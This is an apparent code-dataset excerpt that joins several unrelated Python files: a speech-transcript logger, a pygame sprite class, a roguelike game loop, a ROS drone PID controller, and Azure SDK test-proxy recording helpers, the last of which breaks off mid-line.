args.recognition_stage == \"stage_two\":\n result = services.stage_two(transcript)\n # Получаем текущую дату (чтобы вписать одинаковую дату и в лог, и в базу данных) и уникальный id операции\n current_time = datetime.datetime.now()\n operation_id = uuid4()\n # Пишем данные в лог и (при необходимости) в базу данных\n services.write_to_log_info(current_time, operation_id, result, args.phone, duration, transcript)\n if args.write_to_database:\n services.write_to_database(current_time, operation_id, result, args.phone, duration, transcript)\n # Удаляем .wav файл\n try:\n os.remove(args.filepath)\n except FileNotFoundError:\n logger.exception(\"Ошибка во время удаления файла\")\n\n\nif __name__ == \"__main__\":\n try:\n main()\n except Exception:\n logger.exception(f\"Ошибка во время выполнения основной программы. Входные данные:\\n{services.create_parser()}\")\n","repo_name":"safeisnotanoption/voicekit_test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31687574619","text":"import pygame\r\n\r\n\r\nclass Gun():\r\n def __init__(self, screen):\r\n self.screen = screen\r\n self.image = pygame.image.load('image/maxresdefault-removebg-preview.png')\r\n self.rect = self.image.get_rect()\r\n self.screen_rect = screen.get_rect()\r\n self.rect.centerx = self.screen_rect.centerx\r\n self.rect.bottom = self.screen_rect.bottom\r\n self.kright = False\r\n self.kleft = False\r\n self.kup = False\r\n self.kdown = False\r\n\r\n\r\n self.image2 = pygame.image.load('image/91c898b7003c432d990708f93b73cfdf.max-1200x800-removebg-preview.png')\r\n self.rect2 = self.image2.get_rect()\r\n self.rect2.centerx = self.screen_rect.centerx\r\n self.rect2.bottom = self.screen_rect.bottom\r\n self.kright2 = False\r\n self.kleft2 = False\r\n self.kup2 = False\r\n self.kdown2 = False\r\n\r\n def output(self):\r\n self.screen.blit(self.image, self.rect)\r\n self.screen.blit(self.image2, self.rect2)\r\n\r\n def update_gun(self):\r\n if self.kright == True:\r\n self.rect.centerx = 1\r\n if self.kleft == True:\r\n self.rect.centerx += 1\r\n if self.kup == True:\r\n self.rect.bottom -= 1\r\n if self.kdown == True:\r\n self.rect.bottom -= 1\r\n\r\n def update_gun2(self):\r\n if self.kright2 == True:\r\n self.rect2.centerx += 1\r\n if self.kleft2 == True:\r\n self.rect2.centerx += 1\r\n if self.kup2 == True:\r\n self.rect2.bottom -= 1\r\n if self.kdown2 == True:\r\n self.rect2.bottom -= 1","repo_name":"Rusliak/finiii","sub_path":"gun.py","file_name":"gun.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74038634722","text":"#!/usr/bin/python3\n# replacing an element in a list at a specific position\n\n\ndef new_in_list(my_list, idx, element):\n if idx < 0 or idx >= len(my_list):\n copy_it = my_list[:]\n return copy_it\n else:\n copy_em = my_list[:]\n copy_em[idx] = element\n return copy_em\n","repo_name":"emelyne1234/alu-higher_level_programming","sub_path":"python-data_structures/4-new_in_list.py","file_name":"4-new_in_list.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35931065763","text":"import libtcodpy as libtcod\nfrom map import Map\nimport decoder\nfrom player import Player\nfrom renderer import Renderer\n\nrace_decoder = decoder.RaceDecoder('races/')\njob_decoder = decoder.JobDecoder('jobs/')\n\nclass Game:\n LEVEL_UP_BASE = 200\n LEVEL_UP_FACTOR = 150\n MAP_WIDTH = 80\n MAP_HEIGHT = 43\n\n @staticmethod\n def new_game(race, job):\n Game.state = 'playing'\n Game.dungeon_level = 1\n Game.mouse = libtcod.Mouse()\n Game.key = libtcod.Key()\n Game.map = Map(Game.MAP_WIDTH, Game.MAP_HEIGHT)\n\n _fighter_component = race_decoder.decode_race_fighter(race)\n _color = race_decoder.decode_race_color(race)\n _job = job_decoder.decode_job(job)\n _start_equipment = job_decoder.decode_job_equipment(job)\n Game.player = Player(Game.map.origin[0], Game.map.origin[1], libtcod.CHAR_SMILIE, 'Drew',\n _color, fighter_component=_fighter_component, race=race, job=_job, start_equipment=_start_equipment)\n Game.map.add_object(Game.player)\n\n Game.renderer = Renderer(Game.map, Game.player)\n Game.renderer.clear_console()\n\n Game.message('Welcome stranger! Prepare to perish in the Tombs of the Ancient Kings.', libtcod.light_green)\n\n @staticmethod\n def message(new_msg, color=libtcod.white):\n Game.renderer.add_message(new_msg, color)\n\n @staticmethod\n def inventory_menu(header):\n if len(Game.player.inventory) == 0:\n options = ['Inventory is empty.']\n else:\n options = []\n for item in Game.player.inventory:\n text = item.name\n if item.equipment and item.equipment.is_equipped:\n text = text + ' (on ' + item.equipment.slot + ')'\n options.append(text)\n\n index = Renderer.menu(header, options, Renderer.INVENTORY_WIDTH)\n if index is None or len(Game.player.inventory) == 0:\n return None\n return Game.player.inventory[index].item\n\n @staticmethod\n def job_menu(header):\n options = []\n abilities = [ability for ability in Game.player.job.abilities if ability['level'] <= Game.player.level]\n for ability in abilities:\n text = ability['name'] + ' (' + str(ability['cost']) + ')'\n options.append(text)\n\n index = Renderer.menu(header, options, Renderer.INVENTORY_WIDTH)\n if index is None:\n return None\n return Game.player.job.abilities[index]\n\n @staticmethod\n def main_menu():\n img = libtcod.image_load('img/menu_background1.png')\n\n while not libtcod.console_is_window_closed():\n Renderer.render_main_screen(img)\n\n choice = Renderer.menu('', ['Play a new game', 'Continue current game', 'Quit'], 24, 0)\n\n if choice == 0:\n Renderer.render_main_screen(img)\n\n races = race_decoder.decode_all_races()\n race = Renderer.menu('Pick a race', races, 15, 0)\n if race is None:\n continue\n\n Renderer.render_main_screen(img)\n\n jobs = job_decoder.decode_all_jobs()\n job = Renderer.menu('Pick a job', jobs, 15, 0)\n if job is None:\n continue\n\n Game.new_game(races[race].lower(), jobs[job].lower())\n Game.run()\n elif choice == 1:\n try:\n Game.run()\n except:\n Game.msgbox('\\n No saved game to load.\\n', 24)\n continue\n elif choice == 2:\n break\n\n @staticmethod\n def msgbox(text, width=50):\n Renderer.menu(text, [], width)\n\n @staticmethod\n def target_tile(max_range=None):\n box = libtcod.console_new(1, 1)\n x = Game.player.x\n y = Game.player.y\n libtcod.console_set_default_background(box, libtcod.orange)\n libtcod.console_clear(box)\n key = Game.key\n\n while (x, y) != (0, 0):\n Game.renderer.render_all()\n Game.renderer.render_names_under_target(x, y)\n Game.renderer.render_target_tile(box, x, y)\n\n key = libtcod.console_wait_for_keypress(True)\n key = libtcod.console_wait_for_keypress(True)\n\n direction = Game.get_direction(key)\n if direction is not None:\n x += direction[0]\n y += direction[1]\n\n else:\n return (None, None)\n\n if direction == (0, 0):\n if Game.map.is_tile_in_fov(x, y) and (max_range is None or Game.player.distance(x, y) <= max_range):\n return (x, y)\n else:\n Game.message('That is out of range.', libtcod.red)\n\n @staticmethod\n def target_monster(max_range=None):\n while True:\n (x, y) = Game.target_tile(max_range)\n if x is None:\n return None\n\n for obj in Game.map.objects:\n if obj.x == x and obj.y == y and obj.fighter and obj != Game.player:\n return obj\n\n @staticmethod\n def target_all_neighbors(x, y, max_range=1):\n monsters = []\n for i in range(int(x - max_range), int(x + max_range + 1)):\n for j in range(int(y - max_range) ,int(y + max_range + 1)):\n obj = Game.map.object_at(i, j)\n if obj is not None and obj.fighter and not obj == Game.player:\n monsters.append(obj)\n return monsters\n\n @staticmethod\n def update():\n for object in Game.map.objects:\n object.update()\n\n @staticmethod\n def next_level():\n Game.message('You take a moment to rest, and recover your strength.', libtcod.light_violet)\n Game.player.fighter.heal(.5)\n Game.player.job.regen_mana(.5)\n\n Game.message('You descend deeper into the heart of the dungeon...', libtcod.red)\n Game.dungeon_level += 1\n Game.map = Map(Game.MAP_WIDTH, Game.MAP_HEIGHT)\n Game.player.x = Game.map.origin[0]\n Game.player.y = Game.map.origin[1]\n Game.map.add_object(Game.player)\n\n Renderer.clear_console()\n Game.renderer.map = Game.map\n\n @staticmethod\n def check_level_up():\n level_up_exp = Game.get_exp_to_level()\n\n while Game.player.fighter.xp >= level_up_exp:\n Game.player.level += 1\n Game.player.fighter.xp -= level_up_exp\n Game.message('Your battle skills grow stronger! You reached level ' + str(Game.player.level) + '!', libtcod.yellow)\n\n choice = None\n while choice is None:\n choice = Renderer.menu('Level up! Choose a stat to raise:\\n',\n ['+20 HP, from (' + str(Game.player.fighter.max_hp) + ')',\n '+10 MP, from (' + str(Game.player.job.max_mp) + ')',\n '+1 attack, from (' + str(Game.player.fighter.power) + ')',\n '+1 dexterity, from (' + str(Game.player.fighter.dexterity) + ')'], Renderer.LEVEL_SCREEN_WIDTH)\n\n if choice == 0:\n Game.player.fighter.base_max_hp += 20\n Game.player.fighter.hp += 20\n elif choice == 1:\n Game.player.job.base_max_mp += 10\n Game.player.job.mp += 10\n elif choice == 2:\n Game.player.fighter.base_power += 1\n elif choice == 3:\n Game.player.fighter.base_dexterity += 1\n Game.renderer.render_all()\n\n @staticmethod\n def get_exp_to_level():\n return Game.LEVEL_UP_BASE + Game.player.level * Game.LEVEL_UP_FACTOR\n\n @staticmethod\n def try_pick_up():\n for object in Game.map.objects:\n if object.x == Game.player.x and object.y == Game.player.y and object.item:\n object.item.pick_up()\n return\n Game.message('You wait.', libtcod.green)\n\n @staticmethod\n def get_direction(key):\n if key.vk == libtcod.KEY_UP or key.vk == libtcod.KEY_KP8:\n return (0, -1)\n elif key.vk == libtcod.KEY_DOWN or key.vk == libtcod.KEY_KP2:\n return (0, 1)\n elif key.vk == libtcod.KEY_LEFT or key.vk == libtcod.KEY_KP4:\n return (-1, 0)\n elif key.vk == libtcod.KEY_RIGHT or key.vk == libtcod.KEY_KP6:\n return (1, 0)\n elif key.vk == libtcod.KEY_HOME or key.vk == libtcod.KEY_KP7:\n return (-1, -1)\n elif key.vk == libtcod.KEY_PAGEUP or key.vk == libtcod.KEY_KP9:\n return (1, -1)\n elif key.vk == libtcod.KEY_END or key.vk == libtcod.KEY_KP1:\n return (-1, 1)\n elif key.vk == libtcod.KEY_PAGEDOWN or key.vk == libtcod.KEY_KP3:\n return (1, 1)\n elif key.vk == libtcod.KEY_KP5 or key.vk == libtcod.KEY_ENTER:\n return (0, 0)\n return None\n\n @staticmethod\n def handle_keys():\n Game.key = libtcod.console_wait_for_keypress(True)\n Game.key = libtcod.console_wait_for_keypress(True)\n\n if Game.key.vk == libtcod.KEY_ESCAPE:\n return 'exit'\n\n if Game.state == 'playing':\n #movement keys\n Game.map.fov_recompute = True\n direction = Game.get_direction(Game.key)\n\n if direction is None:\n Game.map.fov_recompute = False\n key_char = chr(Game.key.c)\n\n if key_char == 'a':\n range = Game.player.get_range()\n monster = Game.target_monster(range)\n if monster is not None:\n Game.player.fighter.attack(monster)\n return 'attacked'\n\n elif key_char == 'c':\n level_up_exp = Game.get_exp_to_level()\n Game.msgbox('Character Information\\n\\nLevel: ' + str(Game.player.level) + '\\nExperience: ' + str(Game.player.fighter.xp) +\n '\\nExperience to level up: ' + str(level_up_exp) + '\\n\\nMaximum HP: ' + str(Game.player.fighter.max_hp) +\n '\\nMaximum MP: ' + str(Game.player.job.max_mp) + '\\nMp Regen ' + str(Game.player.job.mp_regen) + '/sec' +\n '\\n\\nAttack: ' + str(Game.player.fighter.power) + '\\nDexterity: ' + str(Game.player.fighter.dexterity), Renderer.CHARACTER_SCREEN_WIDTH)\n\n elif key_char == 'd':\n chosen_item = Game.inventory_menu('Press the key next to an item to drop it.\\n')\n if chosen_item is not None:\n chosen_item.drop()\n\n elif key_char == 'g':\n Game.try_pick_up()\n\n elif key_char == 'i':\n chosen_item = Game.inventory_menu('Press the key next to an item to use it.\\n')\n if chosen_item is not None:\n chosen_item.use()\n return 'used-item'\n\n elif key_char == 'j':\n ability = Game.job_menu(\"Press the key next to an ability to use it.\\n\")\n if ability is not None:\n Game.player.use_ability(ability)\n return 'used-ability'\n\n elif key_char == 'l':\n Game.target_tile()\n\n elif key_char == '<':\n if Game.map.stairs.x == Game.player.x and Game.map.stairs.y == Game.player.y:\n Game.next_level()\n\n return 'didnt-take-turn'\n\n elif direction == (0, 0):\n Game.try_pick_up()\n pass\n\n else:\n Game.player.move_or_attack(direction[0], direction[1])\n\n\n @staticmethod\n def run():\n player_action = None\n\n while not libtcod.console_is_window_closed():\n Game.renderer.render_all()\n Game.check_level_up()\n\n player_action = Game.handle_keys()\n\n if player_action == 'exit':\n break\n\n if Game.state == 'playing' and player_action != 'didnt-take-turn':\n Game.update()\n","repo_name":"drewtorg/roguelike","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34578740834","text":"#!/usr/bin/env python3\n\n\n# Importing the required libraries\n\nfrom vitarana_drone.msg import *\nfrom vitarana_drone.srv import *\nfrom pid_tune.msg import PidTune\nfrom sensor_msgs.msg import Imu, NavSatFix, LaserScan\nfrom std_msgs.msg import Float32, String\nimport rospy\nimport time\nimport tf\n\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\n#from pyzbar.pyzbar import decode\n\n\nclass Edrone():\n\t\"\"\"docstring for Edrone\"\"\"\n\tdef __init__(self):\n\t\t#qr_detect\n\t\trospy.init_node('position_controller') #Initialise rosnode \n\t\tself.img = np.empty([])\n\t\tself.image_sub = rospy.Subscriber(\"/edrone/camera/image_raw\", Image, self.image_callback) #Subscribing to the camera topic\n\t\t# This will contain your image frame from camera\n\t\tself.bridge = CvBridge()\n\t\tlogo_cascade = cv2.CascadeClassifier('data/cascade.xml')\n\t\t\n\t\t# Format for drone_command\n\t\tself.cmd_drone = edrone_cmd()\n\t\tself.cmd_drone.rcRoll = 1500\n\t\tself.cmd_drone.rcPitch = 1500\n\t\tself.cmd_drone.rcYaw = 1500\n\t\tself.cmd_drone.rcThrottle = 0\n\n\t\tself.cmd_gripper = Gripper()\n\t\tself.cmd_gripper.activate_gripper = False\n\t\tself.cmd_gripper.result = False\n\n\t\t# The latitude, longitude and altitude of the drone\n\t\tself.latitude = 0\n\t\tself.longitude = 0\n\t\tself.altitude = 0\n\n\t\tself.count = 0\n\t\t# The coordinates in the target postion vector is in the order latitude, longitude and altitude\n\t\tself.build1_target = [18.9990965928, 72.0000664814, 10.75]\n\t\tself.build2_target = [18.9990965925, 71.9999050292, 22.2]\n\t\tself.build3_target = [18.9993675932, 72.0000569892, 10.7]\n\t\tself.height_target = 35.00#26.0519618605\n\n\t\tself.Kp = [4000000, 50]\n\t\tself.Ki = [0, 0.32]\n\t\tself.Kd = [5000000, 80]\n\n\t\tself.build1_error = [0, 0, 0, 0, 0]\n\t\tself.build2_error = [0, 0, 0, 0, 0]\n\t\tself.build3_error = [0, 0, 0, 0, 0]\n\t\tself.prev_error = [0, 0, 0 ,0, 0]\n\t\tself.error_sum = [0, 0, 0 ,0, 0]\n\n\t\tself.build1_lat_out = 0\n\t\tself.build1_long_out= 0\n\t\tself.build1_alt_out = 0\n\n\t\tself.build2_lat_out = 0\n\t\tself.build2_long_out = 0\n\t\tself.build2_alt_out = 0\n\n\t\tself.build3_lat_out = 0\n\t\tself.build3_long_out = 0\n\t\tself.build3_alt_out = 0\n\n\t\tself.out_altitude_height = 0\n\n\t\tself.final_latitude = 0\n\t\tself.final_longitude = 0\n\t\tself.final_altitude = 0\n\n\t\tself.min_value = [1450, 1450, 1000]\n\t\tself.max_value = [1550, 1550, 2000]\n\n\t\tself.range1 = 0.0\n\t\tself.range2 = 0.0\n\t\tself.range3 = 0.0\n\t\tself.range4 = 0.0\n\t\tself.range5 = 0.0\n\n\t\tself.x = 0.0\n\t\tself.y = 0.0\n\t\tself.sample_time = 0.060 # in seconds\n\n\t\tself.x_distance = 0.0\n\t\tself.y_distance = 0.0\n\n\t\tself.cmd_pub = rospy.Publisher('/drone_command', edrone_cmd, queue_size=1)\n\t\tself.alt_error = rospy.Publisher('/alt_error',Float32, queue_size=1)\n\t\tself.zero_error = rospy.Publisher('/zero_error',Float32, queue_size=1)\n\t\trospy.Subscriber('/edrone/gps', NavSatFix, self.gps_callback)\n\t\trospy.Subscriber('/edrone/range_finder_bottom', LaserScan, self.range_finder_callback)\n\t\trospy.Subscriber('/edrone/gripper_check', String, self.gripper_check_callback)\n\t\tself.box_attachment_service = rospy.ServiceProxy('/edrone/activate_gripper', Gripper)\n\n\t\n\tdef image_callback(self, data):\n\t\ttry:\n\t\t\tself.img = self.bridge.imgmsg_to_cv2(data, \"bgr8\") # Converting the image to OpenCV standard image\n\t\texcept CvBridgeError as e:\n\t\t\tprint(e)\n\t\t\treturn\n\t\t\n\n\tdef gps_callback(self, msg):\n\t\tself.latitude = msg.latitude\n\t\tself.longitude = msg.longitude\n\t\tself.altitude = msg.altitude\n\n\tdef range_finder_callback(self, msg):\n\t\tself.range_bottom = msg.ranges[0]\n\t\t#rospy.loginfo(self.range_bottom)\n\t\n\tdef gripper_check_callback(self, msg):\n\t\tself.gripper_check = msg.data\n\t\t#rospy.loginfo(self.gripper_check)\n\t\n\tdef marker_detect(self,img_frame):\n\t\timg_width = 400\n\t\thfov_rad = 1.3962634\n\t\tfocal_length = (img_width/2)/math.tan(hfov_rad/2)\n\t\t#print(focal_length)\n\n\t\t#logo_cascade = cv2.CascadeClassifier('data/cascade.xml')\n\n\t\t#img = cv2.imread('data/test_3.png') # Source image\n\t\t#cv2.imshow(\"image\",img)\n\t\tgray = cv2.cvtColor(img_frame, cv2.COLOR_BGR2GRAY)\n\n\t\tlogo = logo_cascade.detectMultiScale(gray, scaleFactor=1.05)\n\n\t\tfor (x, y, w, h) in logo:\n\t\t\tcv2.rectangle(img_frame, (x, y), (x + w, y + h), (255, 255, 0), 2)\n\n\t\tcenterx = x + w/2\n\t\tcentery = y + h/2\n\t\t#cv2.imshow(\"window_name\", image)\t\n\t\t#plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\t\t#plt.show()\n\n\t\tZ_m = self.range_bottom\n\t\tself.x_distance = centerx*Z_m/focal_length\n\t\tself.y_distance = centery*Z_m/focal_length\n\n\tdef pid(self):\n\t\tself.x = 110692.0702932625 * (self.latitude - 19)\n\t\tself.y = -105292.0089353767 * (self.longitude - 72)\n\t\t#rospy.loginfo(self.altitude)\n\n\t\t#from initial positon to box\n\t\t# Calculating the error\n\t\tself.build1_error[0] = self.build1_target[0] - self.latitude\n\t\tself.build1_error[1] = self.build1_target[1] - self.longitude\n\t\tself.build1_error[2] = self.build1_target[2] - self.altitude\n\t\tself.build1_error[3] = self.height_target - self.altitude\n\t\t \n\t\t\n\t\tself.error_sum[0] = self.error_sum[0] + self.build1_error[0]\n\t\tself.error_sum[1] = self.error_sum[1] + self.build1_error[1]\n\t\tself.error_sum[2] = self.error_sum[2] + self.build1_error[2]\n\t\tself.error_sum[3] = self.error_sum[3] + self.build1_error[3]\n\t\t\n\t\tself.build1_lat_out = (self.Kp[0] * self.build1_error[0]) + (self.Ki[0] * self.error_sum[0]) + ((self.Kd[0] * (self.build1_error[0] - self.prev_error[0]))/self.sample_time)\n\t\tself.build1_long_out = (self.Kp[0] * self.build1_error[1]) + (self.Ki[0] * self.error_sum[1]) + ((self.Kd[0] * (self.build1_error[1] - self.prev_error[1]))/self.sample_time)\n\t\tself.build1_alt_out = (self.Kp[1] * self.build1_error[2]) + (self.Ki[1] * self.error_sum[2]) + ((self.Kd[1] * (self.build1_error[2] - self.prev_error[2]))/self.sample_time)\n\n\t\tself.out_altitude_height = (self.Kp[1] * self.build1_error[3]) + (self.Ki[1] * self.error_sum[3]) + ((self.Kd[1] * (self.build1_error[3] - self.prev_error[3]))/self.sample_time)\n\t\t# Changing the previous sum value\n\t\tself.prev_error[0] = self.build1_error[0]\n\t\tself.prev_error[1] = self.build1_error[1]\n\t\tself.prev_error[2] = self.build1_error[2]\n\t\tself.prev_error[3] = self.build1_error[3]\n\n\n\t\tself.count += 1\n\t\trospy.loginfo(self.count)\n\n\t\tif self.count < 200:\n\t\t\trospy.loginfo(\"path1\")\n\t\t\trospy.loginfo(self.count)\n\t\t\tself.cmd_drone.rcRoll = 1500\n\t\t\tself.cmd_drone.rcPitch = 1500\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\n\t\tif self.count >= 200 and self.count < 500:\n\t\t\trospy.loginfo(\"path2\")\n\t\t\tself.cmd_drone.rcRoll = 1500 + self.build1_lat_out\n\t\t\tself.cmd_drone.rcPitch = 1500\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\trospy.loginfo(self.count)\n\n\t\tif self.count >= 500 and self.count < 1200:\n\t\t\trospy.loginfo(\"path3\")\n\t\t\tself.cmd_drone.rcRoll = 1500 #+ self.build1_lat_out\n\t\t\tself.cmd_drone.rcPitch = 1500 + self.build1_long_out\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\trospy.loginfo(self.count)\n\n\t\tif self.count >= 1200 and self.count < 12000:\n\t\t\trospy.loginfo(\"path4\")\n\t\t\tself.cmd_drone.rcRoll = 1500 + self.build1_lat_out\n\t\t\tself.cmd_drone.rcPitch = 1500 + self.build1_long_out\n\t\t\tself.cmd_drone.rcYaw = 1500\n\t\t\tself.cmd_drone.rcThrottle = 1500 + self.out_altitude_height\n\t\t\trospy.loginfo(self.count)\n\t\t\tif self.count == 1400:\n\t\t\t\tmarker_detect(self.img)\n\t\t\trospy.loginfo(self.x_distance)\n\t\t\trospy.loginfo(self.y_distance)\n\n\t\tif self.cmd_drone.rcRoll > self.max_value[0]:\n\t\t\tself.cmd_drone.rcRoll = self.max_value[0]\n\t\telif self.cmd_drone.rcRoll < self.min_value[0]:\n\t\t\tself.cmd_drone.rcRoll = self.min_value[0]\n\t\telse:\n\t\t\tself.cmd_drone.rcRoll = self.cmd_drone.rcRoll\n\n\t\tif self.cmd_drone.rcPitch > self.max_value[1]:\n\t\t\tself.cmd_drone.rcPitch = self.max_value[1]\n\t\telif self.cmd_drone.rcPitch < self.min_value[1]:\n\t\t\tself.cmd_drone.rcPitch = self.min_value[1]\n\t\telse:\n\t\t\tself.cmd_drone.rcPitch = self.cmd_drone.rcPitch\n\n\t\tif self.cmd_drone.rcThrottle > self.max_value[2]:\n\t\t\tself.cmd_drone.rcThrottle = self.max_value[2]\n\t\telif self.cmd_drone.rcThrottle < self.min_value[2]:\n\t\t\tself.cmd_drone.rcThrottle = self.min_value[2]\n\t\telse:\n\t\t\tself.cmd_drone.rcThrottle = self.cmd_drone.rcThrottle\n\n\n\n\t\tself.cmd_pub.publish(self.cmd_drone)\n\t\t#publishig errors:\n\t\t#self.alt_error.publish(self.error)\n\t\t#self.zero_error.publish(0.0)\n\n\n\nif __name__ == '__main__':\n\n\te_drone = Edrone()\n\tr = rospy.Rate(1/e_drone.sample_time) # specify rate in Hz based upon your desired PID sampling time, i.e. if desired sample time is 33ms specify rate as 30Hz\n\twhile not rospy.is_shutdown():\n\t\te_drone.pid()\n\t\tr.sleep()","repo_name":"AshutoshGeek/Drone-ROS","sub_path":"scripts/position_controller.py","file_name":"position_controller.py","file_ext":"py","file_size_in_byte":8561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"3631746122","text":"import logging\nimport six\nimport os\nfrom typing import TYPE_CHECKING\nimport urllib.parse as url_parse\n\nfrom azure.core.exceptions import HttpResponseError, ResourceNotFoundError\nfrom azure.core.pipeline.policies import ContentDecodePolicy\n\n# the functions we patch\ntry:\n from azure.core.pipeline.transport import RequestsTransport\nexcept:\n pass\n\n# the trimming function to clean up incoming arguments to the test function we are wrapping\nfrom azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function\n\nfrom .config import PROXY_URL\nfrom .helpers import get_http_client, get_test_id, is_live, is_live_and_not_recording, set_recording_id\nfrom .proxy_startup import discovered_roots\nfrom urllib3.exceptions import HTTPError\nimport json\n\nif TYPE_CHECKING:\n from typing import Callable, Dict, Tuple\n from azure.core.pipeline.transport import HttpRequest\n\n# To learn about how to migrate SDK tests to the test proxy, please refer to the migration guide at\n# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md\n\n# defaults\nRECORDING_START_URL = \"{}/record/start\".format(PROXY_URL)\nRECORDING_STOP_URL = \"{}/record/stop\".format(PROXY_URL)\nPLAYBACK_START_URL = \"{}/playback/start\".format(PROXY_URL)\nPLAYBACK_STOP_URL = \"{}/playback/stop\".format(PROXY_URL)\n\n\ndef get_recording_assets(test_id: str) -> str:\n \"\"\"Used to retrieve the assets.json given a PYTEST_CURRENT_TEST test id.\"\"\"\n for root in discovered_roots:\n current_dir = os.path.dirname(test_id)\n while current_dir is not None and not (os.path.dirname(current_dir) == current_dir):\n possible_assets = os.path.join(current_dir, \"assets.json\")\n possible_root = os.path.join(current_dir, \".git\")\n\n # we need to check for assets.json first!\n if os.path.exists(os.path.join(root, possible_assets)):\n complete_path = os.path.abspath(os.path.join(root, possible_assets))\n return os.path.relpath(complete_path, root).replace(\"\\\\\", \"/\")\n # we need the git check to prevent ascending out of the repo\n elif os.path.exists(os.path.join(root, possible_root)):\n return None\n else:\n current_dir = os.path.dirname(current_dir)\n\n return None\n\n\ndef start_record_or_playback(test_id: str) -> \"Tuple[str, Dict[str, str]]\":\n \"\"\"Sends a request to begin recording or playing back the provided test.\n\n This returns a tuple, (a, b), where a is the recording ID of the test and b is the `variables` dictionary that maps\n test variables to values. If no variable dictionary was stored when the test was recorded, b is an empty dictionary.\n \"\"\"\n variables = {} # this stores a dictionary of test variable values that could have been stored with a recording\n\n json_payload = {\"x-recording-file\": test_id}\n assets_json = get_recording_assets(test_id)\n if assets_json:\n json_payload[\"x-recording-assets-file\"] = assets_json\n\n encoded_payload = json.dumps(json_payload).encode(\"utf-8\")\n http_client = get_http_client()\n\n if is_live():\n result = http_client.request(\n method=\"POST\",\n url=RECORDING_START_URL,\n body=encoded_payload,\n )\n if result.status != 200:\n message = six.ensure_str(result.data)\n raise HttpResponseError(message=message)\n recording_id = result.headers[\"x-recording-id\"]\n\n else:\n result = http_client.request(\n method=\"POST\",\n url=PLAYBACK_START_URL,\n body=encoded_payload,\n )\n if result.status != 200:\n message = six.ensure_str(result.data)\n raise HttpResponseError(message=message)\n\n try:\n recording_id = result.headers[\"x-recording-id\"]\n except KeyError as ex:\n six.raise_from(ValueError(\"No recording file found for {}\".format(test_id)), ex)\n if result.data:\n try:\n variables = json.loads(result.data.decode(\"utf-8\"))\n except ValueError as ex: # would be a JSONDecodeError on Python 3, which subclasses ValueError\n six.raise_from(\n ValueError(\"The response body returned from starting playback did not contain valid JSON\"),\n ex,\n )\n\n # set recording ID in a module-level variable so that sanitizers can access it\n set_recording_id(test_id, recording_id)\n return (recording_id, variables)\n\n\ndef stop_record_or_playback(test_id: str, recording_id: str, test_variables: \"Dict[str, str]\") -> None:\n try:\n http_client = get_http_client()\n if is_live():\n http_client.request(\n method=\"POST\",\n url=RECORDING_STOP_URL,\n headers={\n \"x-recording-file\": test_id,\n \"x-recording-id\": recording_id,\n \"x-recording-save\": \"true\",\n \"Content-Type\": \"application/json\",\n },\n # tests don't record successfully unless test_variables is a dictionary\n body=json.dumps(test_variables).encode(\"utf-8\") if test_variables else \"{}\",\n )\n else:\n http_client.request(\n method=\"POST\",\n url=PLAYBACK_STOP_URL,\n headers={\"x-recording-id\": recording_id},\n )\n except HTTPError as e:\n raise HttpResponseError(\n \"The test proxy ran into an error while ending the session. Make sure any test variables you record have \"\n \"string values.\"\n ) from e\n\n\ndef get_proxy_netloc() -> \"Dict[str, str]\":\n parsed_result = url_parse.urlparse(PROXY_URL)\n return {\"scheme\": parsed_result.scheme, \"netloc\": parsed_result.netloc}\n\n\ndef transform_request(request: \"HttpRequest\", recording_id: str) -> None:\n \"\"\"Redirect the request to the test proxy, and store the original request URI in a header\"\"\"\n headers = request.headers\n\n parsed_result = url_parse.urlparse(request.url)\n updated_target = parsed_result._replace(**get_proxy_netloc()).geturl()\n if headers.get(\"x-recording-upstream-base-uri\", None) is None:\n headers[\"x-recording-upstream-base-uri\"] = \"{}://{}\".format(parsed_result.scheme, parsed_result.netloc)\n headers[\"x-recording-id\"] = recording_id\n headers[\"x-recording-mode\"] = \"record\" if is_live() else \"playback\"\n request.url = updated_target\n\n\ndef recorded_by_proxy(test_func: \"Callable\") -> None:\n \"\"\"Decorator that redirects network requests to target the azure-sdk-tools test proxy. Use with recorded tests.\n\n For more details and usage examples, refer to\n https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md\n \"\"\"\n\n def record_wrap(*args, **kwargs):\n def transform_args(*args, **kwargs):\n copied_positional_args = list(args)\n request = copied_positional_args[1]\n\n transform_request(request, recording_id)\n\n return tuple(copied_positional_args), kwargs\n\n trimmed_kwargs = {k: v for k, v in kwargs.items()}\n trim_kwargs_from_test_function(test_func, trimmed_kwargs)\n\n if is_live_and_not_recording():\n return test_func(*args, **trimmed_kwargs)\n\n test_id = get_test_id()\n recording_id, variables = start_record_or_playback(test_id)\n original_transport_func = RequestsTransport.send\n\n def combined_call(*args, **kwargs):\n adjusted_args, adjusted_kwargs = transform_args(*args, **kwargs)\n result = original_transport_func(*adjusted_args, **adjusted_kwargs)\n\n # make the x-recording-upstream-base-uri the URL of the request\n # this makes the request look like it was made to the original endpoint instead of to the proxy\n # without this, things like LROPollers can get broken by polling the wrong endpoint\n parsed_result = url_parse.urlparse(result.request.url)\n upstream_uri = 